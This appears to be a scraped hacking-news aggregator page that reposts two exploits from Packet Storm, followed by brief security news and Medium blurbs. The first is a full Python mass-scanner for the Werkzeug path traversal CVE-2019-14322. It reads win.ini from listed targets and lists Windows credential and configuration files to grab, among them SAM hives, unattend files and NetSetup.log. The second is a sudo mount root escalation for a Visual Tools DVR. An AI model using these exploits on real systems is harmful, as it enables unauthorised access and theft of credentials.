Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Pallets Werkzeug 0.15.4 Path Traversal
https://4.bp.blogspot.com/-JipZY3hUF7s/WWlu7l1ccBI/AAAAAAAAIJc/HAISYb4KBsQdeIf6OzzYRuXiYaIkpQnmACLcBGAs/s1600/h110.png Proof of concept exploit for a path traversal vulnerability in Pallets Werkzeug version 0.15.4.
MD5 |
Pallets Werkzeug 0.15.4 Path Traversal
https://4.bp.blogspot.com/-JipZY3hUF7s/WWlu7l1ccBI/AAAAAAAAIJc/HAISYb4KBsQdeIf6OzzYRuXiYaIkpQnmACLcBGAs/s1600/h110.png Proof of concept exploit for a path traversal vulnerability in Pallets Werkzeug version 0.15.4.
MD5 |
262f237db7999ab766781c5e99c59463Download #!/usr/bin/env python3
# PoC code by @faisalfs10x [https://github.com/faisalfs10x]
""" $ pip3 install colorama==0.3.3, argparse, requests, urllib3
$ python3 CVE-2019-14322.py -l list_target.txt"
"""
import argparse
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
import requests
from colorama import Fore, Back, Style, init
# Colors
red = '\033[91m'
green = '\033[92m'
white = '\033[97m'
yellow = '\033[93m'
bold = '\033[1m'
end = '\033[0m'
init(autoreset=True)
def banner_motd():
print(Fore.CYAN +Style.BRIGHT +"""
CVE-2019-14322 %sPoC by faisalfs10x%s - (%s-%s)%s %s
""" % (bold, red, white, yellow, white, end))
banner_motd()
# list of sensitive files to grab in windows
# %windir%\repair\sam
# %windir%\System32\config\RegBack\SAM
# %windir%\repair\system
# %windir%\repair\software
# %windir%\repair\security
# %windir%\debug\NetSetup.log (AD domain name, DC name, internal IP, DA account)
# %windir%\iis6.log (5,6 or 7)
# %windir%\system32\logfiles\httperr\httperr1.log
# C:\sysprep.inf
# C:\sysprep\sysprep.inf
# C:\sysprep\sysprep.xml
# %windir%\Panther\Unattended.xml
# C:\inetpub\wwwroot\Web.config
# %windir%\system32\config\AppEvent.Evt (Application log)
# %windir%\system32\config\SecEvent.Evt (Security log)
# %windir%\system32\config\default.sav
# %windir%\system32\config\security.sav
# %windir%\system32\config\software.sav
# %windir%\system32\config\system.sav
# %windir%\system32\inetsrv\config\applicationHost.config
# %windir%\system32\inetsrv\config\schema\ASPNET_schema.xml
# %windir%\System32\drivers\etc\hosts (dns entries)
# %windir%\System32\drivers\etc\networks (network settings)
# %windir%\system32\config\SAM
# TLDR:
# C:/windows/system32/inetsrv/config/schema/ASPNET_schema.xml
# C:/windows/system32/inetsrv/config/applicationHost.config
# C:/windows/system32/logfiles/httperr/httperr1.log
# C:/windows/debug/NetSetup.log - (may contain AD domain name, DC name, internal IP, DA account)
# C:/windows/system32/drivers/etc/hosts - (dns entries)
# C:/windows/system32/drivers/etc/networks - (network settings)
def check(url):
# There are 3 endpoints to be tested by default, but to avoid noisy, just pick one :)
# This script reads c:/windows/win.ini as a proof of concept.
for endpoint in [
'https://{}/base_import/static/c:/windows/win.ini',
#'https://{}/web/static/c:/windows/win.ini',
#'https://{}/base/static/c:/windows/win.ini'
]:
try:
url2 = endpoint.format(url)
resp = requests.get(url2, verify=False, timeout=5)
if 'fonts' and 'files' and 'extensions' in resp.text:
print(Fore.LIGHTGREEN_EX +Style.BRIGHT +" [+] " +url2+ " : vulnerable====[+]")
with open('CVE-2019-14322_result.txt', 'a+') as output:
output.write('{}\n'.format(url2))
output.close()
else:
print(" [-] " +url+ " : not vulnerable")
except KeyboardInterrupt:
exit('User aborted!')
except:
print(" [-] " +url+ " : not vulnerable")
def main(args):
f = open(listfile, "r")
for w in f:
url = w.strip()
check(url)
if __name__ == '__main__':
try:
parser = argparse.ArgumentParser(description='CVE-2019-14322')
parser.add_argument("-l","--targetlist",required=True, help = "target list in file")
args = parser.parse_args()
listfile = args.targetlist
main(args)
except KeyboardInterrupt:
exit('User aborted!') Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Visual Tools DVR VX16 4.2.28 Privilege Escalation
https://2.bp.blogspot.com/-n3YJZo98ptc/WWlvfHNo4ZI/AAAAAAAAIP8/W2JyxBpYTHMTjkJx5zl91eYOlgUDpw8egCLcBGAs/s1600/h84.png
Visual Tools DVR VX16 version 4.2.28 suffers from a local privilege escalation vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
Visual Tools DVR VX16 4.2.28 Privilege Escalation
https://2.bp.blogspot.com/-n3YJZo98ptc/WWlvfHNo4ZI/AAAAAAAAIP8/W2JyxBpYTHMTjkJx5zl91eYOlgUDpw8egCLcBGAs/s1600/h84.png
Visual Tools DVR VX16 version 4.2.28 suffers from a local privilege escalation vulnerability.
MD5 |
5de46b08cc144d6d68dc6d3754aad651Download
# Exploit Title: Visual Tools DVR VX16 4.2.28 - Local Privilege Escalation
# Date: 2021-07-05
# Exploit Author: Andrea D'Ubaldo
# Vendor Homepage: https://visual-tools.com/
# Version: Visual Tools VX16 v4.2.28.0
# Tested on: VX16 Embedded Linux 2.6.35.4.
#An attacker can perform a system-level (root) local privilege escalation abusing unsafe Sudo configuration.
sudo mount -o bind /bin/sh /bin/mount
sudo mount
Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
Alleged Cybercriminal Arrested in Morocco Following Interpol Probe
The suspect operated under the name "Dr Hex" to target thousands of people through phishing, fraud, and carding activities.
Alleged Cybercriminal Arrested in Morocco Following Interpol Probe
The suspect operated under the name "Dr Hex" to target thousands of people through phishing, fraud, and carding activities.
Dark Reading: Attacks/Breaches
Workers Careless in Sharing & Reusing Corporate Secrets
A new survey shows leaked enterprise secrets costs companies millions of dollars each year.
Workers Careless in Sharing & Reusing Corporate Secrets
A new survey shows leaked enterprise secrets costs companies millions of dollars each year.
Install haktrails on Kali Linux
haktrails : (subdomain) recon tool for bug bounty.Continue reading on Medium »
Read more...
haktrails : (subdomain) recon tool for bug bounty.Continue reading on Medium »
Read more...
Introducing Bug Bounty Program for Oraichain and its ecosystem
Oraichain recognizes the community’s value in bringing security and completeness to Oraichain and its ecosystem. We welcome and seek to…Continue reading on Oraichain »
Read more...
Oraichain recognizes the community’s value in bringing security and completeness to Oraichain and its ecosystem. We welcome and seek to…Continue reading on Oraichain »
Read more...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
The 5 Vulnerable Layers of the Internet and International Cyberspace
https://cdn-images-1.medium.com/max/1280/1*CuzgaW29t-np-CuWZVY6Rw.jpeg
How technological naivety could lead to the ultimate betrayal
Continue reading on Medium »
The 5 Vulnerable Layers of the Internet and International Cyberspace
https://cdn-images-1.medium.com/max/1280/1*CuzgaW29t-np-CuWZVY6Rw.jpeg
How technological naivety could lead to the ultimate betrayal
Continue reading on Medium »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
[TryHackMe] Pre Security Learning Path Honest Review — The best path for beginners to follow
https://cdn-images-1.medium.com/max/1320/0*BNqGROxaVLnVUJti.png
TryHackMe published a new learning path, Pre Security Learning Path , This is the best place to start your journey into the field of IT.
Continue reading on Medium »
[TryHackMe] Pre Security Learning Path Honest Review — The best path for beginners to follow
https://cdn-images-1.medium.com/max/1320/0*BNqGROxaVLnVUJti.png
TryHackMe published a new learning path, Pre Security Learning Path , This is the best place to start your journey into the field of IT.
Continue reading on Medium »